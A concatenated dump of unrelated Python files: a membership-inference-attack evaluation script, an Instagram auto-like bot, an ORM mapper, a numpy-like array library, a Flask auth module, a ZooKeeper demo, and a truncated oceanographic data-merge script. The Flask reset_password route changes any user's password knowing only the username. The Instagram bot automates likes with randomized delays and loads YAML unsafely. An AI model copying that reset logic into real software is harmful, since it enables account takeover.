content
stringlengths 5
1.05M
|
|---|
import argparse
import pandas as pd
import os
import sys
import numpy as np
import torch
from utils import computeMetricsAlt, evalThresholdAlt
from ModelShokri import DataHandler, TrainWBAttacker
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser(description='Analyse criteria obtained from different MIAs.')
parser.add_argument('--model_type', type=str, help='Model Architecture to attack.')
parser.add_argument('--num_iters', type=int, default=20, help='Number of iterations for empirical estimation.')
parser.add_argument('--working_dir', type=str, default='./', help='Where to collect and store data.')
exp_parameters = parser.parse_args()
currdir = exp_parameters.working_dir
num_runs_for_random = exp_parameters.num_iters
model_type = exp_parameters.model_type
# Extracting intermediate outputs and gradients of the model
InterOuts_Grads0 = np.load(currdir + '/RawResults/NasrTrain0_' + model_type + '.npz')
InterOuts_Grads1 = np.load(currdir + '/RawResults/NasrTrain1_' + model_type + '.npz')
AdditionalInfo = np.load(currdir + '/RawResults/NasrAddInfo_' + model_type + '.npz')
inter_outs0 = []
inter_outs1 = []
out_size_list = AdditionalInfo['arr_0']
layer_size_list = AdditionalInfo['arr_1']
kernel_size_list = AdditionalInfo['arr_2']
n_inter_outputs = len(out_size_list)
n_layer_grads = len(kernel_size_list)
for i in range(n_inter_outputs):
inter_outs0.append(InterOuts_Grads0['arr_' + str(i)])
inter_outs1.append(InterOuts_Grads1['arr_' + str(i)])
lossval0 = InterOuts_Grads0['arr_' + str(n_inter_outputs)]
lossval1 = InterOuts_Grads1['arr_' + str(n_inter_outputs)]
labels1hot0 = InterOuts_Grads0['arr_' + str(n_inter_outputs + 1)]
labels1hot1 = InterOuts_Grads1['arr_' + str(n_inter_outputs + 1)]
grad_vals0 = []
grad_vals1 = []
for i in range(n_inter_outputs + 2, n_inter_outputs + 2 + n_layer_grads, 1):
grad_vals0.append(InterOuts_Grads0['arr_' + str(i)])
grad_vals1.append(InterOuts_Grads1['arr_' + str(i)])
# Our Analysis
FPR = np.linspace(0, 1, num=1001)
try:
dfMetricsBalanced = pd.read_csv(currdir + '/CompleteResults/BalancedMetrics_' + model_type + '.csv')
dfTPRBalanced = pd.read_csv(currdir + '/CompleteResults/BalancedROC_' + model_type + '.csv')
except FileNotFoundError:
dfMetricsBalanced = pd.DataFrame(columns=['Attack Strategy',
'AUROC', 'AUROC STD',
'Best Accuracy', 'Best Accuracy STD',
'FPR at TPR80', 'FPR at TPR80 STD',
'FPR at TPR85', 'FPR at TPR85 STD',
'FPR at TPR90', 'FPR at TPR90 STD',
'FPR at TPR95', 'FPR at TPR95 STD'])
dfTPRBalanced = pd.DataFrame(FPR, columns=['FPR'])
aux_list_metrics = []
aux_list_TPR = []
for k in range(num_runs_for_random):
np.random.seed(k)
indx_train0 = np.random.choice(lossval0.shape[0], size=4000, replace=False)
indx_train1 = np.random.choice(lossval1.shape[0], size=4000, replace=False)
indx_test0 = np.setdiff1d(np.arange(lossval0.shape[0]), indx_train0)
indx_test0 = np.random.choice(indx_test0, size=6000, replace=False)
indx_test1 = np.setdiff1d(np.arange(lossval1.shape[0]), indx_train1)
indx_test1 = np.random.choice(indx_test1, size=6000, replace=False)
trainingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_train0, indx_train1)
Max = trainingData.Max
Min = trainingData.Min
testingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_test0, indx_test1, Max=Max, Min=Min)
AttackerShokri = TrainWBAttacker(trainingData, testingData, out_size_list, layer_size_list, kernel_size_list)
dataloaderEval = DataLoader(testingData, batch_size=100, shuffle=False)
scoresEval = []
EvalY = []
with torch.no_grad():
for i, batch in enumerate(dataloaderEval):
example = batch[0]
target = batch[1]
scoresEval.append(AttackerShokri(*example).detach())
EvalY.append(target.cpu().data.numpy())
scoresEval = torch.cat(scoresEval, axis=0)
scoresEval = torch.squeeze(scoresEval)
scoresEval = scoresEval.cpu().data.numpy()
EvalY = np.squeeze(np.concatenate(EvalY, axis=0))
TPR_, metrics_ = computeMetricsAlt(scoresEval, EvalY, FPR)
aux_list_metrics.append(metrics_)
aux_list_TPR.append(TPR_)
metrics = np.stack(aux_list_metrics, 1)
mean_metrics = np.mean(metrics, 1)
std_metrics = np.std(metrics, 1)
new_row = {"Attack Strategy": 'Nasr White-Box',
'AUROC': mean_metrics[0], 'AUROC STD': std_metrics[0],
'Best Accuracy': mean_metrics[1], 'Best Accuracy STD': std_metrics[1],
'FPR at TPR80': mean_metrics[2], 'FPR at TPR80 STD': std_metrics[2],
'FPR at TPR85': mean_metrics[3], 'FPR at TPR85 STD': std_metrics[3],
'FPR at TPR90': mean_metrics[4], 'FPR at TPR90 STD': std_metrics[4],
'FPR at TPR95': mean_metrics[5], 'FPR at TPR95 STD': std_metrics[5]}
dfMetricsBalanced = dfMetricsBalanced.append(new_row, ignore_index=True)
TPR = np.stack(aux_list_TPR, 1)
mean_TPR = np.mean(TPR, 1)
std_TPR = np.std(TPR, 1)
dfTPRaux = pd.DataFrame(np.stack((mean_TPR, std_TPR), axis=1), columns=['Nasr White-Box TPR',
'Nasr White-Box TPR STD'])
dfTPRBalanced = dfTPRBalanced.join(dfTPRaux)
# Rezaei Analysis
try:
dfMetricsRezaei = pd.read_csv(currdir + '/CompleteResults/RezaeiMetrics_' + model_type + '.csv')
except FileNotFoundError:
dfMetricsRezaei = pd.DataFrame(columns=['Attack Strategy',
'Best Accuracy', 'Best Accuracy STD',
'FPR', 'FPR STD'])
aux_list_metrics = []
for k in range(num_runs_for_random):
np.random.seed(k)
indx_train0 = np.random.choice(lossval0.shape[0], size=8000, replace=False)
indx_train1 = np.random.choice(lossval1.shape[0], size=40000, replace=False)
indx_test0 = np.setdiff1d(np.arange(lossval0.shape[0]), indx_train0)
indx_test0 = np.random.choice(indx_test0, size=2000, replace=False)
indx_test1 = np.setdiff1d(np.arange(lossval1.shape[0]), indx_train1)
indx_test1 = np.random.choice(indx_test1, size=10000, replace=False)
trainingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_train0, indx_train1)
Max = trainingData.Max
Min = trainingData.Min
testingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_test0, indx_test1, Max=Max, Min=Min)
AttackerShokri = TrainWBAttacker(trainingData, testingData, out_size_list, layer_size_list, kernel_size_list)
dataloaderEval = DataLoader(testingData, batch_size=100, shuffle=False)
scoresEval = []
EvalY = []
for i, batch in enumerate(dataloaderEval):
example = batch[0]
target = batch[1]
scoresEval.append(AttackerShokri(*example))
EvalY.append(target.cpu().data.numpy())
scoresEval = torch.cat(scoresEval, axis=0)
scoresEval = torch.squeeze(scoresEval)
scoresEval = scoresEval.cpu().data.numpy()
EvalY = np.squeeze(np.concatenate(EvalY, axis=0))
metrics_ = evalThresholdAlt(0.5, scoresEval, EvalY)
aux_list_metrics.append(metrics_)
metrics = np.stack(aux_list_metrics, 1)
mean_metrics = np.mean(metrics, 1)
std_metrics = np.std(metrics, 1)
new_row = {"Attack Strategy": 'Nasr White-Box',
'Best Accuracy': mean_metrics[0], 'Best Accuracy STD': std_metrics[0],
'FPR': mean_metrics[1], 'FPR STD': std_metrics[1]}
dfMetricsRezaei = dfMetricsRezaei.append(new_row, ignore_index=True)
print('Evaluation of Shokri White-Box: done')
sys.stdout.flush()
sys.stderr.flush()
if not os.path.exists(currdir + '/CompleteResults'):
os.makedirs(currdir + '/CompleteResults')
dfMetricsBalanced.to_csv(currdir + '/CompleteResults/BalancedMetrics_' + model_type + '.csv', index=False)
dfTPRBalanced.to_csv(currdir + '/CompleteResults/BalancedROC_' + model_type + '.csv', index=False)
dfMetricsRezaei.to_csv(currdir + '/CompleteResults/RezaeiMetrics_' + model_type + '.csv', index=False)
|
from InstagramAPI import InstagramAPI as IG
from pprint import PrettyPrinter
from getpass import getpass
from random import randint
from datetime import datetime
import time
import yaml
import os
# Auto like user IG post by given list
pp = PrettyPrinter(indent=2)
count = 0
d1 = int(time.time())
print("=================")
print("I N S T A G R A M")
print(" Auto Like Post! ")
print("=================")
yaml_config_file_path = os.path.join(os.path.abspath(
os.path.dirname(__file__)), 'maxigbot.yml')
bot_config = yaml.load(open(yaml_config_file_path))
if len(bot_config) > 0:
print(">> Configuration file loaded.\n")
list_user = bot_config['maxigbot']['auto-like-post']['account']
print(">> Total IG user to process: {0}".format(len(list_user)))
fin_user = 0
for user in list_user:
api = IG(user['username'], user['password'])
api.login()
print(">> IG user '{0}' logged!".format(user['username']))
print(">> Total target user: {0}".format(len(user['target-user'])))
tot_target = len(user['target-user'])
fin_target = 0
for t_user in user['target-user']:
print(">> Now targeting user '{0}'.".format(t_user))
TARGET = {
'username': '',
'media': '',
'media_like': [],
}
TARGET['username'] = t_user
api.searchUsername(TARGET['username'])
TARGET['user_data'] = api.LastJson['user']
print(">> Checking '{0}' posts.".format(
TARGET['username']
))
print(">> Fetch '{1}' feed at {0}".format(
time.strftime("%d-%m-%Y %H:%M", time.localtime()),
t_user))
api.getUserFeed(str(TARGET['user_data']['pk']))
media = TARGET['media'] = api.LastJson['items']
print(">> Total '{0}' post: {1} posts.".format(
TARGET['username'],
len(TARGET['media'])
))
for item in media:
# print all payload from new feeds
# pp.pprint(item)
print("===========================================================")
if item['has_liked']:
print("User {1} with Post ID {0} has been liked.".format(
item['id'], t_user))
else:
ts = int(int(item['device_timestamp'])/1000000)
local_time = time.localtime(ts)
print("User ID : {0}".format(t_user))
print("Post ID : {0}".format(item['id']))
print("Post Time (Local) : {0}".format(
time.strftime("%d-%m-%Y %H:%M", local_time)))
print("Like Post : {0}".format(item['has_liked']))
print("Total like count : {0}".format(item['like_count']))
if 'carousel_media' in item:
list_img = item['carousel_media']
print("Carousel Img URL :")
for img in list_img:
print(
"\t* {0}".format(img['image_versions2']['candidates'][1]['url']))
else:
print(
"Sample Image URL :\n\t* {0}".format(item['image_versions2']['candidates'][1]['url']))
if item['caption'] != None:
print("Post caption : {0}".format(
item['caption']['text'] or 'No caption!'))
hasLiked = api.like(item['id'])
if hasLiked:
print(">> You just liked this post at {0}".format(
time.strftime("%d-%m-%Y %H:%M", time.localtime())))
TARGET['media_like'].append(item['id'])
count = count + 1
print(">> Total auto post like : {0}".format(count))
rnd = randint(10, 20)
print(
">> Delay {0} secs for next post to like.".format(rnd))
time.sleep(rnd)
print(">> Process '{1}' to target user '{0}' done!".format(
t_user, user['username']))
fin_target = fin_target + 1
if fin_target < tot_target:
wait_next_target = randint(20, 30)
print(">> Wait {0} secs for next target user.\n".format(
wait_next_target))
time.sleep(wait_next_target)
else:
print(">> Done all target user for '{0}'.".format(
user['username']))
fin_user = fin_user + 1
if fin_user < len(list_user):
api.logout()
wait_next_user = randint(30, 45)
print(">> Wait {0} secs for next IG user process.\n".format(
wait_next_user))
time.sleep(wait_next_user)
else:
print("======================================================= END")
d2 = int(time.time())
print("All done in {0} secs".format(d2-d1))
|
"""
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Organization mapper.
"""
from sqlalchemy.orm import column_property
from everest.repositories.rdb.utils import as_slug_expression
from everest.repositories.rdb.utils import mapper
from thelma.entities.organization import Organization
from thelma.repositories.rdb.mappers.utils import CaseInsensitiveComparator
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(organization_tbl):
"Mapper factory."
m = mapper(Organization, organization_tbl,
id_attribute='organization_id',
slug_expression=lambda cls: as_slug_expression(cls.name),
properties=dict(
name=column_property(
organization_tbl.c.name,
comparator_factory=CaseInsensitiveComparator
),
),
)
return m
|
# Copyright (C) 2020 by Univeristy of Edinburgh
from numbers import Number
from typing import Any, List, Tuple
import numpy as np # type: ignore
import numpy.lib.mixins # type: ignore
import delayrepay.backend as be
_backend = be.backend
def cast(func):
"""cast to Delay array decorator"""
def wrapper(*args, **kwargs):
arr = func(*args, **kwargs)
if not isinstance(arr, DelayArray):
arr = NPArray(arr)
return arr
return wrapper
class DelayArray(numpy.lib.mixins.NDArrayOperatorsMixin):
count = 0
def __init__(self, *args, **kwargs):
self._memo = None
self._count = DelayArray.count
DelayArray.count += 1
self._inputs = {}
def __repr__(self):
return str(self.__array__())
def __array__(self):
# return NumpyFunction(self.ex)()
try:
return self.array
except AttributeError:
self.array = _backend.run(self)
return self.array
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
if len(inputs) > 1:
left = inputs[0]
right = inputs[1]
if not isinstance(left, Number) and not isinstance(right, Number):
if left.shape != right.shape:
if left.shape != (0,) and right.shape != (0,):
return ufunc_lookup[ufunc.__name__](
left.__array__(), right.__array__()
)
if ufunc.__name__ == "matmul":
return None
return self._dot(inputs, kwargs)
# cls = func_to_numpy_ex(ufunc)
args = [arg_to_numpy_ex(arg) for arg in inputs]
return create_ex(ufunc, args)
def _dot_mv(self, args, kwargs):
return MVEx(args[0], args[1])
def _dot_mm(self, args, kwargs):
return MMEx(args[0], args[1])
def __matmul__(self, other):
return self._dot([self, other], {})
@cast
def _dot(self, args, kwargs):
# scalar result dot
args = [arg_to_numpy_ex(arg) for arg in args]
# if is_matrix_matrix(args[0].shape, args[1].shape):
# return self._dot_mm(args, kwargs)
# if is_matrix_vector(args[0].shape, args[1].shape):
# return self._dot_mv(args, kwargs)
left = args[0].__array__()
right = args[1].__array__()
# TODO: independent fallback mechanism
return _backend.fallback.dot(left, right)
def __array_function__(self, func, types, args, kwargs):
if func.__name__ == "dot":
return self._dot(args, kwargs)
return HANDLED_FUNCTIONS[func](*args, **kwargs)
def __gt__(self, other):
return greater(self, other)
def __lt__(self, other):
return less(self, other)
def dot(self, other, out=None):
return self._dot(other, out)
def get(self):
arr = self.__array__()
try:
return arr.get()
except AttributeError:
return arr
def run(self):
self.__array__()
def reshape(self, *args, **kwargs):
return NPArray(self.__array__().reshape(*args, **kwargs))
def __setitem__(self, key, item):
arr = self.__array__()
if isinstance(key, DelayArray):
key = key.__array__()
if isinstance(item, DelayArray):
item = item.__array__()
arr[key] = item
@cast
def __getitem__(self, key):
if isinstance(key, DelayArray):
key = key.__array__()
arr = self.__array__()
return arr[key]
def var(self, *args, **kwargs):
return np.var(self, *args, **kwargs)
def sum(self, *args, **kwargs):
return np.sum(self, *args, **kwargs)
def __len__(self):
return self.shape[0]
@property
def T(self):
if len(self.shape) == 1:
return self
return np.transpose(self)
def repeat(self, *args, **kwargs):
return repeat(self, *args, **kwargs)
# delayrepay CG stuff
@property
def name(self):
return f"arr{self._count}"
@property
def inputs(self):
return {self.name: self}
Shape = Tuple[int, int]
OPS = {
"matmul": "@",
"add": "+",
"multiply": "*",
"subtract": "-",
"true_divide": "/",
}
FUNCS = {
"power": "pow",
"arctan2": "atan2",
"absolute": "abs",
"sin": "sin",
"cos": "cos",
"tan": "tan",
"sqrt": "sqrt",
"log": "log",
# HACK
"negative": "-",
"exp": "exp",
"tanh": "tanh",
"sinh": "sinh",
"cosh": "cosh",
}
ufunc_lookup = {
"matmul": _backend.np.matmul,
"add": _backend.np.add,
"multiply": _backend.np.multiply,
"subtract": _backend.np.subtract,
"true_divide": _backend.np.true_divide,
}
def calc_shape(left, right, op=None):
if left == (0,):
return right
if right == (0,):
return left
if op.__name__ in OPS:
return left
if op.__name__ == "dot":
# for now
if len(left) > 1 and len(right) > 1:
return (left[0], right[1])
elif len(left) > 1:
return (left[0],)
else:
return (0,)
else:
return left
class Memoiser(type):
"""Metaclass implementing caching"""
def __new__(meta, *args, **kwargs):
cls = super(Memoiser, meta).__new__(meta, *args, **kwargs)
meta._cache = {}
return cls
def __call__(cls, *args):
if type(args[0]).__name__ == "ndarray":
key = id(args[0])
else:
key = hash(args)
if key not in cls._cache:
Memoiser._cache[key] = super(Memoiser, cls).__call__(*args)
return cls._cache[key]
def reset():
# hacks
Memoiser._cache.clear()
class NumpyEx(DelayArray, metaclass=Memoiser):
children: List["NumpyEx"]
"""Numpy expression"""
def __init__(self, children: List["NumpyEx"] = []):
super().__init__()
self.dtype = None
self.children = children
def __hash__(self):
"""
Should work because of the Memoizer
"""
return id(self)
@property
def inputs(self):
ret = {}
for child in self.children:
ret.update(child.inputs)
return ret
@property
def name(self):
assert(False, "should not be called")
return f"numex{self.count}"
class Funcable:
def to_op(self):
return OPS[self.func.__name__]
class ReduceEx(NumpyEx, Funcable):
def __init__(self, func, arg):
super().__init__(children=[arg])
self.func = func
self.shape = (0,)
# func: np.ufunc
# arg: NumpyEx
@property
def name(self):
return f"redex{self._count}"
class UnaryFuncEx(NumpyEx, Funcable):
def __init__(self, func, arg):
super().__init__(children=[arg])
self.func = func
self.shape = arg.shape
self.dtype = arg.dtype
def to_op(self):
return FUNCS[self.func.__name__]
@property
def name(self):
return f"unfunc{self._count}"
class BinaryFuncEx(NumpyEx):
def __init__(self, func, left, right):
super().__init__(children=[left, right])
self.func = func
self.shape = calc_shape(left.shape, right.shape, func)
self.dtype = calc_type(left, right)
def to_op(self):
return FUNCS[self.func.__name__]
@property
def name(self):
return f"binfun{self._count}"
def pow_ex(func, left, right):
if not isinstance(right.val, int):
return BinaryFuncEx(func, left, right)
ex = left
for i in range(right.val - 1):
# will give odd expression tree, but OK
ex = BinaryNumpyEx(np.multiply, ex, left)
return ex
def create_ex(func, args):
if func.__name__ in OPS:
return BinaryNumpyEx(func, *args)
if func.__name__ == "square":
return BinaryNumpyEx(np.multiply, args[0], args[0])
if len(args) == 1:
return UnaryFuncEx(func, *args)
if func.__name__ == "power":
return pow_ex(func, *args)
return BinaryFuncEx(func, *args)
class BinaryNumpyEx(NumpyEx, Funcable):
"""Binary numpy expression"""
# TODO make properties for shape and dtype
def __init__(self, func, left, right):
super().__init__(children=[left, right])
self.func = func
self.shape = calc_shape(left.shape, right.shape, func)
self.dtype = calc_type(left, right)
@property
def name(self):
return f"binex{self._count}"
class MMEx(NumpyEx, Funcable):
# arg1: NumpyEx
# arg2: NumpyEx
def __init__(self, arg1, arg2):
super().__init__()
self.arg1 = arg1
self.arg2 = arg2
self.shape = calc_shape(arg1.shape, arg2.shape, np.dot)
class MVEx(NumpyEx, Funcable):
# arg1: NumpyEx
# arg2: NumpyEx
def __init__(self, arg1, arg2):
super().__init__()
self.arg1 = arg1
self.arg2 = arg2
self.shape = calc_shape(arg1.shape, arg2.shape, np.dot)
class DotEx(NumpyEx, Funcable):
def __init__(self, left, right):
super().__init__()
self.arg1 = left
self.arg2 = right
self.shape = calc_shape(left.shape, right.shape, np.dot)
self._inshape = left.shape
class NPArray(NumpyEx):
"""ndarray"""
def __init__(self, array):
super().__init__()
self.array = array
self.shape = array.shape
self.dtype = array.dtype
def __hash__(self):
return id(self.array)
def __eq__(self, other):
try:
return self.array is other.array
except AttributeError:
return False
def astype(self, *args, **kwargs):
old = self.array
cast_arr = self.array.astype(*args, **kwargs)
del NPArray._cache[id(old)]
NPArray._cache[id(cast_arr)] = self
self.array = cast_arr
self.dtype = cast_arr.dtype
return self
@property
def name(self):
return f"arr{self._count}"
@property
def inputs(self):
return {self.name: self}
class NPRef(NumpyEx):
"""Only for when breaking dependency chains for fusion"""
def __init__(self, node: NumpyEx, shape: Shape):
super().__init__()
self.ref = node
self.children = []
self.shape = shape
@property
def array(self):
return self.ref.array
class Scalar(NumpyEx):
"""a scalar"""
# val: Number
def __init__(self, val):
super().__init__()
self.val = val
self.shape = (0,)
def __hash__(self):
return hash(self.val)
@property
def name(self):
return str(self.val)
@property
def inputs(self):
return {}
def is_matrix_matrix(left, right):
return len(left) > 1 and len(right) > 1
def is_matrix_vector(left, right):
return len(left) > 1 and len(right) == 1
def calc_type(node1: NumpyEx, node2: NumpyEx) -> np.dtype:
if node1.dtype is not None:
node2.dtype = node1.dtype
return node1.dtype
node1.dtype = node2.dtype
return node2.dtype
def arg_to_numpy_ex(arg: Any) -> NumpyEx:
if isinstance(arg, DelayArray):
return arg
elif isinstance(arg, Number):
return Scalar(arg)
elif _backend.is_ndarray(arg):
return NPArray(arg)
else:
print(type(arg))
raise NotImplementedError
HANDLED_FUNCTIONS = {}
def implements(np_function):
"Register an __array_function__ implementation for DiagonalArray objects."
def decorator(func):
HANDLED_FUNCTIONS[np_function] = func
return func
return decorator
@implements(np.diag)
def diag(arr, k=0):
if isinstance(arr.ex, NPArray):
arr._ndarray = np.ascontiguousarray(np.diag(arr._ndarray, k))
assert arr._ndarray.flags["C_CONTIGUOUS"]
arr.ex = NPArray(arr._ndarray)
return arr
else:
return NotImplemented
@implements(np.diagflat)
@cast
def diagflat(arr, k=0):
# keep it simple for now
return np.diagflat(np.asarray(arr, order="C"))
@implements(np.var)
def var(arr, *args, **kwargs):
return _backend.fallback.var(arr.__array__(), *args, **kwargs)
@implements(np.sum)
def sum(arr, *args, **kwargs):
return _backend.fallback.sum(arr.__array__(), *args, **kwargs)
@implements(np.transpose)
@cast
def transpose(arr, *args, **kwargs):
return _backend.fallback.transpose(arr.__array__(), *args, **kwargs)
@implements(np.roll)
@cast
def roll(arr, *args, **kwargs):
return _backend.fallback.roll(arr.__array__(), *args, **kwargs)
@implements(np.max)
def max(arr, *args, **kwargs):
return _backend.fallback.max(arr.__array__(), *args, **kwargs)
@cast
@implements(np.maximum)
def maximum(arr, *args, **kwargs):
return _backend.fallback.maximum(arr.__array__(), *args, **kwargs)
@implements(np.average)
def average(arr, *args, **kwargs):
return _backend.fallback.average(arr.__array__(), *args, **kwargs)
@implements(np.repeat)
@cast
def repeat(arr, *args, **kwargs):
return _backend.fallback.repeat(arr.__array__(), *args, **kwargs)
@cast
@implements(np.cumsum)
def cumsum(arr, *args, **kwargs):
return _backend.fallback.cumsum(arr.__array__(), *args, **kwargs)
@implements(np.greater)
def greater(arr1, arr2, *args, **kwargs):
return _backend.fallback.greater(arr1.__array__(), arr2, *args, **kwargs)
@implements(np.less)
def less(arr1, arr2, *args, **kwargs):
return _backend.fallback.less(arr1.__array__(), arr2, *args, **kwargs)
add = np.add
multiply = np.multiply
dot = np.dot
cos = np.cos
sin = np.sin
tan = np.tan
tanh = np.tanh
sinh = np.sinh
cosh = np.cosh
arctan2 = np.arctan2
subtract = np.subtract
exp = np.exp
log = np.log
power = np.power
sqrt = np.sqrt
square = np.square
abs = np.abs
newaxis = _backend.fallback.newaxis
# dtypes etc.
double = np.double
float32 = np.float32
uint32 = np.uint32
# Ones and zeros
empty = cast(_backend.fallback.empty)
empty_like = cast(_backend.fallback.empty_like)
eye = cast(_backend.fallback.eye)
identity = cast(_backend.fallback.identity)
ones = cast(_backend.fallback.ones)
ones_like = cast(_backend.fallback.ones_like)
zeros = cast(_backend.fallback.zeros)
zeros_like = cast(_backend.fallback.zeros_like)
full = cast(_backend.fallback.full)
full_like = cast(_backend.fallback.full_like)
@implements(np.tile)
@cast
def tile(arr, *args, **kwargs):
if isinstance(arr, DelayArray):
temp = np.array(arr.__array__().get())
print(type(temp))
return _backend.fallback.tile(temp, *args, **kwargs)
# From existing data
array = cast(_backend.fallback.array)
asarray = cast(_backend.fallback.asarray)
asanyarray = cast(_backend.fallback.asanyarray)
ascontiguousarray = cast(_backend.fallback.ascontiguousarray)
asmatrix = cast(np.asmatrix)
copy = cast(_backend.fallback.copy)
frombuffer = cast(np.frombuffer)
fromfile = cast(np.fromfile)
fromfunction = cast(np.fromfunction)
fromiter = cast(np.fromiter)
fromstring = cast(np.fromstring)
loadtxt = cast(np.loadtxt)
# Numerical ranges
arange = cast(_backend.fallback.arange)
linspace = cast(_backend.fallback.linspace)
logspace = cast(_backend.fallback.logspace)
geomspace = cast(np.geomspace)
# Building matrices
tri = cast(_backend.fallback.tri)
tril = cast(_backend.fallback.tril)
triu = cast(_backend.fallback.triu)
vander = cast(np.vander)
|
from flask import Blueprint, render_template, abort, request, redirect, url_for, flash
from jinja2 import TemplateNotFound
from flask_login import current_user, logout_user, login_user, login_required
from .auth_forms import RegisterForm, LoginForm, ResetPasswordForm
from ..models import db, User, Post, Category
auth_bp = Blueprint("auth_bp", __name__)
@auth_bp.route('/register', methods=['GET', 'POST'])
def register():
if not current_user.is_anonymous:
return redirect(url_for("main_bp.index"))
form = RegisterForm()
if form.validate_on_submit():
user = User(name=form.username.data, email=form.email.data)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('auth_bp.login'))
return render_template('auth/register.html', form=form)
@auth_bp.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_anonymous:
form = LoginForm()
if request.method == 'POST' and form.validate_on_submit():
user = User.query.filter_by(name=form.username.data).first()
if (user is None) or (not user.check_password(form.password.data)):
flash('Invalid username or password')
return redirect(url_for('auth_bp.login'))
login_user(user, remember=form.remember_me.data)
return redirect(url_for('main_bp.index'))
return render_template('auth/login.html', form=form)
else:
return redirect(url_for("main_bp.index"))
@auth_bp.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main_bp.index"))
@auth_bp.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
if not current_user.is_anonymous:
return redirect(url_for("main_bp.index"))
form = ResetPasswordForm()
if form.validate_on_submit():
user = User.query.filter_by(name=form.username.data).first()
if user is None:
flash(f"username:{form.username.data} doesn't exist")
return redirect(url_for('auth_bp.reset_password'))
user.set_password(form.password.data)
db.session.commit()
flash(f"username:{form.username.data} have changed your password.")
return redirect(url_for('auth_bp.login'))
return render_template('auth/reset_password.html', form=form)
|
import time
from kazoo.client import KazooClient
from kazoo.client import KazooState
import logging
logging.basicConfig()
def my_listener(state):
if state == KazooState.LOST:
# Register somewhere that the session was lost
print 'The session is lost: %s' % str(state)
elif state == KazooState.SUSPENDED:
# Handle being disconnected from Zookeeper
print 'The session is suspended: %s' % str(state)
else:
# Handle being connected/reconnected to Zookeeper
print 'The session is reconnected: %s' % str(state)
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
zk.add_listener(my_listener)
# Ensure a path, create if necessary
zk.ensure_path("/dragonflow/table1")
@zk.ChildrenWatch("/dragonflow")
def watch_children(children):
print("Children are now: %s" % children)
# Above function called immediately, and from then on
@zk.DataWatch("/dragonflow/table1/key1")
def watch_data(data, stat):
print("Data are now: %s" % data)
# Determine if a node exists
if zk.exists("/dragonflow/table1/key1"):
# Do something
# Print the version of a node and its data
data, stat = zk.get("/dragonflow/table1/key1")
print("Version: %s, data: %s" % (stat.version, data.decode("utf-8")))
# List the children
children = zk.get_children("/dragonflow/table1")
print("There are %s children with names %s" % (len(children), children))
# Update the data
zk.set("/dragonflow/table1/key1", b"value2")
# Print the version of a node and its data
data, stat = zk.get("/dragonflow/table1/key1")
print("Version: %s, data: %s" % (stat.version, data.decode("utf-8")))
else:
zk.create("/dragonflow/table1/key1", b"value1")
value = 0
while(1):
time.sleep(1)
zk.set("/dragonflow/table1/key1", "%d" % value)
value = value + 1
|
"""
Background:
===========
CTDpNUT_ncgen.py
Purpose:
========
Creates EPIC flavored, merged .nc files downcast ctd and nutrient data.
Data assumes a sparse grid for nutrient data, scales it up to the full 1m grid of
ctd data and then matches on depth. Finally, it writes a new file (mirrored to the
ctd file but with addtional variables defined by the nut config file)
Todo: switch from EPIC to CF , copy global attributes and ctd files from CTD/Nut casts instead
of specifying config files.
File Format:
============
- S.Bell - epic ctd and epic nut data
- Pavlof DB for cruise/cast metadata
(Very Long) Example Usage:
==========================
History:
========
Compatibility:
==============
python >=3.6
python 2.7 - ?
"""
from __future__ import absolute_import, division, print_function
import argparse
import datetime
import os
import sys
from shutil import copyfile
import numpy as np
import pandas as pd
from netCDF4 import Dataset
import io_utils.ConfigParserLocal as ConfigParserLocal
import io_utils.EcoFOCI_netCDF_write as EcF_write
from calc.EPIC2Datetime import Datetime2EPIC, get_UDUNITS
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
__author__ = "Shaun Bell"
__email__ = "shaun.bell@noaa.gov"
__created__ = datetime.datetime(2018, 6, 14)
__modified__ = datetime.datetime(2018, 6, 14)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = "netCDF", "meta", "header", "QC", "bottle", "discreet"
"""------------------------------- MAIN--------------------------------------------"""
parser = argparse.ArgumentParser(
description="Merge and archive nutrient csv data and 1m downcast data"
)
parser.add_argument(
"CruiseID", metavar="CruiseID", type=str, help="provide the cruiseid"
)
parser.add_argument(
"ctd_ncpath", metavar="ctd_ncpath", type=str, help="ctd netcdf directory"
)
parser.add_argument(
"nut_ncpath", metavar="nut_ncpath", type=str, help="nutrient netcdf directory"
)
parser.add_argument(
"output",
metavar="output",
type=str,
help="full path to output folder (files will be generated there",
)
parser.add_argument(
"config_file_name",
metavar="config_file_name",
type=str,
default="",
help="full path to config file - ctdpnut_epickeys.yaml",
)
parser.add_argument("-v", "--verbose", action="store_true", help="output messages")
parser.add_argument(
"-csv", "--csv", action="store_true", help="output merged data as csv"
)
args = parser.parse_args()
# Get all netcdf files from mooring directory
ctd_ncfiles = [
args.ctd_ncpath + f for f in os.listdir(args.ctd_ncpath) if f.endswith(".nc")
]
nut_ncfiles = [
args.nut_ncpath + f for f in os.listdir(args.nut_ncpath) if f.endswith(".nc")
]
# get config file for output content
if args.config_file_name.split(".")[-1] in ["json", "pyini"]:
EPIC_VARS_dict = ConfigParserLocal.get_config(args.config_file_name, "json")
elif args.config_file_name.split(".")[-1] in ["yaml"]:
EPIC_VARS_dict = ConfigParserLocal.get_config(args.config_file_name, "yaml")
else:
sys.exit("Exiting: config files must have .pyini, .json, or .yaml endings")
# loop through all ctd files - skip files without downcast for now
for ind, cast in enumerate(ctd_ncfiles):
nut_cast = cast.split("/")[-1].replace("_ctd", "_nut")
print(
"Merging {ctdfile} and {nutfile}".format(
